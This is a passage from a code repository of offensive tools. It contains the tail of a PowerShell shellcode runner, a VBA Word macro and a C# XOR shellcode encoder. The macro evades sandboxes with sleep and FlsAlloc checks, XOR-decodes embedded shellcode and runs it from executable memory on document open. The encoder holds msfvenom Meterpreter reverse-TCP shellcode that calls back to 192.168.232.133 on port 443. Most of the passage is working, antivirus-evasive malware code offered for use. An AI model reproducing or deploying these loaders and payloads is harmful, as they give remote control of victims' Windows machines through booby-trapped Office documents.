47 | $hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),
48 | (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
49 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),
50 | (getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Simple Shellcode Runner.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Simple Shellcode Runner", "Simple Shellcode Runner.csproj", "{1659E645-27B0-4AB9-A10E-64BA4B801CB0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Release|Any CPU.ActiveCfg = Release|x64
17 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Release|Any CPU.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {AD661BF8-44C4-4DF0-8EF0-6B38C519DD39}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Simple Shellcode Runner.vba:
--------------------------------------------------------------------------------
1 | Private Declare PtrSafe Function Sleep Lib "kernel32" (ByVal mili As Long) As Long
2 | Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As LongPtr
3 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
4 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal destAddr As LongPtr, ByRef sourceAddr As Any, ByVal length As Long) As LongPtr
5 | Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr
6 | Sub LegitMacro()
7 | Dim allocRes As LongPtr
8 | Dim t1 As Date
9 | Dim t2 As Date
10 | Dim time As Long
11 | Dim buf As Variant
12 | Dim addr As LongPtr
13 | Dim counter As Long
14 | Dim data As Long
15 | Dim res As LongPtr
16 |
17 | ' Call FlsAlloc and verify if the result exists
18 | allocRes = FlsAlloc(0)
19 | If IsNull(allocRes) Then
20 | End
21 | End If
22 |
23 | ' Sleep for 10 seconds and verify time passed
24 | t1 = Now()
25 | Sleep (10000)
26 | t2 = Now()
27 | time = DateDiff("s", t1, t2)
28 | If time < 10 Then
29 | Exit Sub
30 | End If
31 |
32 | ' Shellcode encoded with XOR with key 0xfa/250 (output from C# helper tool)
33 | buf = Array(6, 178, 121, 30, 10, 18, 54, 250, 250, 250, 187, 171, 187, 170, 168, 178, 203, 40, 159, 178, 113, 168, 154, 171, 178, 113, 168, 226, 178, 113, 168, 218, 172, 178, 245, 77, 176, 176, 178, 113, 136, 170, 183, 203, 51, 178, 203, 58, 86, 198, 155, _
34 | 134, 248, 214, 218, 187, 59, 51, 247, 187, 251, 59, 24, 23, 168, 178, 113, 168, 218, 187, 171, 113, 184, 198, 178, 251, 42, 156, 123, 130, 226, 241, 248, 245, 127, 136, 250, 250, 250, 113, 122, 114, 250, 250, 250, 178, 127, 58, 142, 157, 178, _
35 | 251, 42, 190, 113, 186, 218, 179, 251, 42, 170, 113, 178, 226, 25, 172, 183, 203, 51, 178, 5, 51, 187, 113, 206, 114, 178, 251, 44, 178, 203, 58, 187, 59, 51, 247, 86, 187, 251, 59, 194, 26, 143, 11, 182, 249, 182, 222, 242, 191, 195, _
36 | 43, 143, 34, 162, 190, 113, 186, 222, 179, 251, 42, 156, 187, 113, 246, 178, 190, 113, 186, 230, 179, 251, 42, 187, 113, 254, 114, 178, 251, 42, 187, 162, 187, 162, 164, 163, 160, 187, 162, 187, 163, 187, 160, 178, 121, 22, 218, 187, 168, 5, _
37 | 26, 162, 187, 163, 160, 178, 113, 232, 19, 177, 5, 5, 5, 167, 179, 68, 141, 137, 200, 165, 201, 200, 250, 250, 187, 172, 179, 115, 28, 178, 123, 22, 90, 251, 250, 250, 179, 115, 31, 179, 70, 248, 250, 251, 65, 58, 82, 203, 185, 187, _
38 | 174, 179, 115, 30, 182, 115, 11, 187, 64, 182, 141, 220, 253, 5, 47, 182, 115, 16, 146, 251, 251, 250, 250, 163, 187, 64, 211, 122, 145, 250, 5, 47, 144, 240, 187, 164, 170, 170, 183, 203, 51, 183, 203, 58, 178, 5, 58, 178, 115, 56, _
39 | 178, 5, 58, 178, 115, 59, 187, 64, 16, 245, 37, 26, 5, 47, 178, 115, 61, 144, 234, 187, 162, 182, 115, 24, 178, 115, 3, 187, 64, 99, 95, 142, 155, 5, 47, 127, 58, 142, 240, 179, 5, 52, 143, 31, 18, 105, 250, 250, 250, 178, _
40 | 121, 22, 234, 178, 115, 24, 183, 203, 51, 144, 254, 187, 162, 178, 115, 3, 187, 64, 248, 35, 50, 165, 5, 47, 121, 2, 250, 132, 175, 178, 121, 62, 218, 164, 115, 12, 144, 186, 187, 163, 146, 250, 234, 250, 250, 187, 162, 178, 115, 8, _
41 | 178, 203, 51, 187, 64, 162, 94, 169, 31, 5, 47, 178, 115, 57, 179, 115, 61, 183, 203, 51, 179, 115, 10, 178, 115, 32, 178, 115, 3, 187, 64, 248, 35, 50, 165, 5, 47, 121, 2, 250, 135, 210, 162, 187, 173, 163, 146, 250, 186, 250, _
42 | 250, 187, 162, 144, 250, 160, 187, 64, 241, 213, 245, 202, 5, 47, 173, 163, 187, 64, 143, 148, 183, 155, 5, 47, 179, 5, 52, 19, 198, 5, 5, 5, 178, 251, 57, 178, 211, 60, 178, 127, 12, 143, 78, 187, 5, 29, 162, 144, 250, 163, _
43 | 65, 26, 231, 208, 240, 187, 115, 32, 5, 47)
44 |
45 | ' Allocate memory space
46 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
47 |
48 | ' Decode the shellcode
49 | For i = 0 To UBound(buf)
50 | buf(i) = buf(i) Xor 250
51 | Next i
52 |
53 | ' Move the shellcode
54 | For counter = LBound(buf) To UBound(buf)
55 | data = buf(counter)
56 | res = RtlMoveMemory(addr + counter, data, 1)
57 | Next counter
58 |
59 | ' Execute the shellcode
60 | res = CreateThread(0, 0, addr, 0, 0, 0)
61 | End Sub
62 | Sub Document_Open()
63 | MyMacro
64 | End Sub
65 | Sub AutoOpen()
66 | MyMacro
67 | End Sub
68 |
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace XorCoder
8 | {
9 | public class Program
10 | {
11 | public static void Main(string[] args)
12 | {
13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
14 | byte[] buf = new byte[511] {
15 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
16 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
17 | 0x8b,0x52,0x20,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
18 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
19 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
20 | 0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
21 | 0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x8b,0x48,
22 | 0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,
23 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,
24 | 0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
25 | 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
26 | 0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58,
27 | 0x41,0x58,0x5e,0x59,0x48,0x01,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
28 | 0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
29 | 0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,
30 | 0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,
31 | 0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0xe8,0x85,0x41,0x54,0x49,0x89,0xe4,
32 | 0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,
33 | 0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,
34 | 0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,
35 | 0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,
36 | 0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,
37 | 0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,
38 | 0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,
39 | 0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,
40 | 0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,
41 | 0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,
42 | 0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,
43 | 0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,
44 | 0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,
45 | 0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
46 | 0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,
47 | 0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,
48 | 0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff,
49 | 0xd5 };
50 |
51 | // Encode the payload with XOR (fixed key)
52 | byte[] encoded = new byte[buf.Length];
53 | for (int i = 0; i < buf.Length; i++)
54 | {
55 | encoded[i] = (byte)((uint)buf[i] ^ 0xfa);
56 | }
57 |
58 | StringBuilder hex = new StringBuilder(encoded.Length * 2);
59 | int totalCount = encoded.Length;
60 | for (int count = 0; count < totalCount; count++)
61 | {
62 | byte b = encoded[count];
63 |
64 | if ((count + 1) == totalCount) // Dont append comma for last item
65 | {
66 | hex.AppendFormat("0x{0:x2}", b);
67 | }
68 | else
69 | {
70 | hex.AppendFormat("0x{0:x2}, ", b);
71 | }
72 |
73 | if ((count + 1) % 15 == 0)
74 | {
75 | hex.Append("\n");
76 | }
77 | }
78 |
79 | Console.WriteLine($"XOR payload (key: 0xfa):");
80 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};");
81 |
82 | //// Decode the XOR payload
83 | //for (int i = 0; i < buf.Length; i++)
84 | //{
85 | // buf[i] = (byte)((uint)buf[i] ^ 0xfa);
86 | //}
87 |
88 | }
89 | }
90 | }
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("XOR Shellcode Encoder")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("XOR Shellcode Encoder")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("ee64b207-d973-489b-84a8-b718b93e039b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/XOR Shellcode Encoder.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {EE64B207-D973-489B-84A8-B718B93E039B}
8 | Exe
9 | XOR_Shellcode_Encoder
10 | XOR Shellcode Encoder
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/XOR Shellcode Encoder/XOR Shellcode Encoder.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XOR Shellcode Encoder", "XOR Shellcode Encoder.csproj", "{EE64B207-D973-489B-84A8-B718B93E039B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {EE64B207-D973-489B-84A8-B718B93E039B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {EE64B207-D973-489B-84A8-B718B93E039B}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {EE64B207-D973-489B-84A8-B718B93E039B}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {EE64B207-D973-489B-84A8-B718B93E039B}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {AB26D59A-5BB7-41F5-969C-46504DCF0D8F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------